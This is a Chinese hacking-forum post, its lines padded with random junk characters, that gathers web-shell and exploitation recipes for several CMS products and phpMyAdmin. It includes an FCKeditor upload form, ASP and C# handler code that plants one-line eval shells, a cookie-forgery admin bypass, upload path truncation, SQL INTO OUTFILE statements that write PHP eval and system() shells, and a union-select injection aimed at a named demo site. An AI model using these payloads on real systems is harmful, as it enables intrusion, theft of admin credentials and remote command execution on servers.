/ a) T' r* I+ v, v' h1 n- T( ]<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">( [. ]: y" X3 F8 W0 N
Upload a new file:<br>; w: p, K$ e. ]. Z' J+ N" d/ y
<input type="file" name="NewFile" size="50"><br>
/ ^1 n9 u6 M2 n" C9 |<input id="btnUpload" type="submit" value="Upload">: u. r1 b$ J, Z- W: `9 [1 y7 b$ b
</form>
! K+ w% x$ J/ J) Z' o) ~-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
. H: ]" d$ a9 {' d" ^# h. y# |& a( K% K+ z1 N( A
SDcms 后台拿webshell
* J L# H7 r/ j- B1 @
0 `$ w; X1 b6 n4 ~- m: {% e" z# a( c第一种方法:4 w7 { R7 o4 B2 h
进入后台-->系统管理-->系统设置-->系统设置->网站名称;9 @. ` _: ?! \ n
把网站名称内容修改为 "%><%eval request("xxx")' //密码为xxx" v. w9 S# O7 P+ J9 a
用菜刀链接http://www.xxx.com/inc/const.asp 就搞定了。1 t; k9 d) ^; P) r+ M
第二种方法:
1 D) B+ }' F7 Y4 P进入后台-->系统管理-->系统设置-->系统设置->上传设置;
1 ?. ?2 W" x9 z! Q在文件类型里面添加一个aaspsp的文件类型,然后找一个上传的地方直接上传asp文件! 注:修改文件类型后不能重复点保存!+ ~& z9 s! E6 `- [
第三种方法:
5 g" w0 _7 s1 |* f% J! c4 t进入后台-->界面管理-->模板文件管理-->创建文件
. ~! b: n2 N* e3 y* N文件名写入getshell.ashx! x' B, K9 N- v" Y3 F3 l% c
内容写入下面内容:
! G- w; ~1 `3 K, e/====================复制下面的=========================/
9 p' `9 V( M. R5 F, T5 [<%@ WebHandler Language="C#" Class="Handler" %>
& ?2 b ^$ O7 T5 ?2 busing System;
* s8 R' Q- O# ~% V" g" Z9 uusing System.Web;
+ G) ?; L' D) H' Xusing System.IO;- k* u; p* y. Q2 q A$ V2 e
public class Handler : IHttpHandler {
- v% y# J& O3 i+ u! T5 w/ }public void ProcessRequest (HttpContext context) {8 d( h7 ~( G6 L: x
context.Response.ContentType = "text/plain";
; ~3 H1 f& z. v! lStreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));
( P) Q7 g9 [2 l2 j' E$ y+ `4 u2 Efile1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");
# F; K, J/ O( c I3 dfile1.Flush();, ?) O9 j" U& k/ c; m; a
file1.Close();
% X- F6 M+ O# d" I7 D}
/ R( c, c! z* T E1 {; Zpublic bool IsReusable {5 N6 w6 p$ A6 E6 G8 Y# {
get {* |# x% x! S/ G' u; h2 F
return false;
! {' p' U* `+ S$ v, m. O}
8 e0 R# s3 h6 g- U) l; l" q, a0 ?}9 f& ^) R' a! w5 J
}+ L" k5 ], j2 P, o& V; Z
/=============================================/6 F/ i- }7 S3 T, |+ L; [
访问这个地址:http://www.xxx.com/skins/2009/getshell.ashx
: m4 a" W/ S; r. z1 `& R7 ]2 ^( Q* s会在http://www.xxx.com/skins/2009/目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接- J1 L9 @$ Y* h' l1 q' o$ A/ Z* Y
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ w8 d2 h. B/ G" l3 I* o
1 z9 V$ ?0 n5 }9 H4 y$ c( c
ESCMS网站管理系统0day4 q4 q9 t6 A& I# f5 q- y5 w
! ]2 @! b7 h$ {5 [$ t/ f后台登陆验证是通过admin/check.asp实现的$ [/ y8 G }9 N: \ e, z, p" q
0 ]( o$ O& H2 X4 m# _" P, _5 P首先我们打开http://target.com/admin/es_index.html+ L" J" [0 B) @( ~: x/ G" O3 V
然后在COOKIE结尾加上6 I: F6 Z/ i" u! T- q( V( H% Z. \
; ESCMS$_SP2=ES_admin=st0p;
& u0 y) y: e! C4 c+ s修改,然后刷新; m7 U _; D, r
进后台了嘎..0 h+ l3 a! S: S
然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL
. J2 X; B8 ^$ z7 n; c: G- Z" C+ a2 w3 x' ^; f" T' V( C: ?
利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.! E8 G7 Y% p9 c7 Z, ?# Z
嘿嘿,成功了,shell地址为http://target.com/admin/diy.asp
. O* h. g) T: E* |存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败..% i( y' v. t: c3 S' A2 R
在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了
- |. x6 L3 T2 {8 X7 X------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
+ G: S& W0 K* Y( S8 }, \' L
" x( u4 ?5 V* } D; x8 d8 A2 J宁志网站管理系统后台无验证漏洞及修复
4 n5 e( u# k9 [
B, P; U0 N8 W6 g3 s. L/ n G" ^网上搜了一下,好像没有发布.如有雷同纯粹巧合!
5 n; C* s: b! N, g; e' I2 ]官方网站:www.ningzhi.net7 D- w* E6 t c* K+ h8 S3 z @5 i
学校网站管理系统 V.2011版本 B/ x; T( R4 T- l, W4 F6 e& l
http://down.chinaz.com/soft/29943.htm
4 H6 G! [2 ]# O c其它版本(如:政府版等),自行下载. F4 S/ N3 h& H! @/ Z
漏洞说明:后台所有文件竟然都没有作访问验证...相当无语...竟然用的人还很多.汗~~~
- O, }( l+ O1 W' @: I% ^login.asp代码如下:5 a3 m0 v1 v$ G7 G9 Z: E8 O6 E
<% response.Write"<script language=javascript>alert('登陆成功!请谨慎操作!谢谢!');this.location.href='manage.asp';</script>" %> " T' M5 v/ v' L8 J
manage.asp代码我就不帖出来了.反正也没验证.
9 g$ s* |7 ?+ U" n6 t+ j! G) F只要访问登陆页就可以成功登陆.....蛋疼~~~ 对此本人表示不理解!
, V8 m6 X, p9 S/ l" @/ u, R( C' G漏洞利用:
' R8 F' \% C5 N" l1 g直接访问http://www.0855.tv/admin/manage.asp
5 J- Q! w" M, R4 S, L! f- E% M2 |数据库操作:http://www.0855.tv/admin/manage_web.asp?txt=5&id=web5
+ v4 h- j, r1 V! ~# `( }5 l----------------------------------------------------------------------------------------------------------------------------------------------------------------------------. q i# o: U( k$ @0 a
- H) \0 J+ F5 J+ f- i- r; N! }5 S; }
phpmyadmin拿shell的四种方法总结及修复' t$ }! F, H' W
' f3 n Y" e( a7 O方法一:/ h- E' j2 s$ j% y! Z, g0 h. `3 J4 j
CREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );
/ |' y) f& Y+ w' p* g( E# @INSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');
( \ H$ `- x0 X/ c3 O$ v7 V1 |SELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';
3 z- C7 D7 }5 ^: ^% U----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php
! G; j) e9 V, F# k# f 一句话连接密码:7on
, L$ O& G6 K5 g方法二:
2 l1 f' k9 a: f% o4 E+ g: r读取文件内容: select load_file('E:/xamp/www/s.php');1 t4 u7 Q! C. ^- t5 z& E4 T
写一句话: select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php'
+ |& ^# e, q* f9 V0 Qcmd执行权限: select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'. t0 T' e' ?' f {+ r
方法三:
, m0 p2 L9 ~# [; iJhackJ版本 PHPmyadmin拿shell" m& V+ T3 m' k. q$ h. c
Create TABLE study (cmd text NOT NULL);
& ]- A6 F* }) {3 {% m: @Insert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');
2 n0 c2 [$ o- q$ l% y- `select cmd from study into outfile 'E:/wamp/www/7.php';
9 w7 {! i7 F+ Z. Z: g$ W$ a4 i! K/ gDrop TABLE IF EXISTS study;
0 P8 V1 F' v" B) K<?php eval($_POST[cmd])?>6 z' W" u! ^( j% r, y+ {
CREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。# L1 x( y) ]. G! l; X3 }
INSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影响列数: 10 Z1 \) K/ x- q, U
SELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数: 1
1 {/ p6 M( c2 V$ R1 C( U" P+ J8 [DROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。$ F L# d. Z; J
方法四:
, S+ [' f# l2 }; r$ `' }( lselect load_file('E:/xamp/www/study.php');
6 {; [5 I7 N$ d" \% N8 D1 U H( p# E+ \select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'+ l: e# B+ P) o& b! c [
然后访问网站目录:http://www.2cto.com/study.php?cmd=dir3 }: x4 d. D/ o
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
; M; ~. e" D/ l+ A' x4 h( w; c4 i9 x. [9 s/ r8 z
NO.001中学网站管理系统 Build 110628 注入漏洞# G+ r3 e; E' y7 L
0 I5 ?6 a, D X+ W2 z9 b4 lNO.001中学网站管理系统功能模块:
: w5 Q9 ^0 q) @1.管理员资料:网站的基本信息设置(校长邮箱等),数据库备份,用户管理、部门及权限管理等
7 Z4 H2 G' B; ~; n% M' t. _2.学校简介:一级分类,可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息9 \: _5 S, d" c) j& p7 r* J# C# ~
3.文章管理:二级分类,动态添加各相关频道(图片视频频道、学校概况频道除外)文章等信息2 f" y g9 z- k3 @
4.视频图片管理:一级分类,动态添加视频或者图片等信息
5 C8 B4 U2 _1 t' K5.留言管理:对留言,修改,删除、回复等管理 X3 ^/ G1 _( m9 b: Z, @
6.校友频道:包括校友资料excel导出、管理等功能2 ?% X& m4 Q6 S) Q0 n' d/ ^$ A; G
7.友情链接管理:二级分类,能建立不同种类的友情链接显示在首页
( V$ C! v& H( R默认后台:admin/login.asp
: B" a; S, s. c$ |官方演示:http://demo.001cms.net% u2 q$ C6 t: w8 U; I$ L1 ^
源码下载地址:http://down.chinaz.com/soft/30187.htm
; n; b, e" v9 n0 \EXP:
a" ^2 v) l& T1 ]' junion select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin' U# a) D( B) @- k
测试:http://demo.001cms.net/shownews.asp?type=新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
! s9 f7 w2 b9 f( R% [$ egetshell:后台有备份,你懂的
: K2 J) z/ {) i! Q另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多,我在这里就不说了。. Z- I6 t$ n' H( o0 I
------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
匿名
发表于 2017-10-28 08:21:04
发表于 2012-9-13 16:58:38
收藏
支持
反对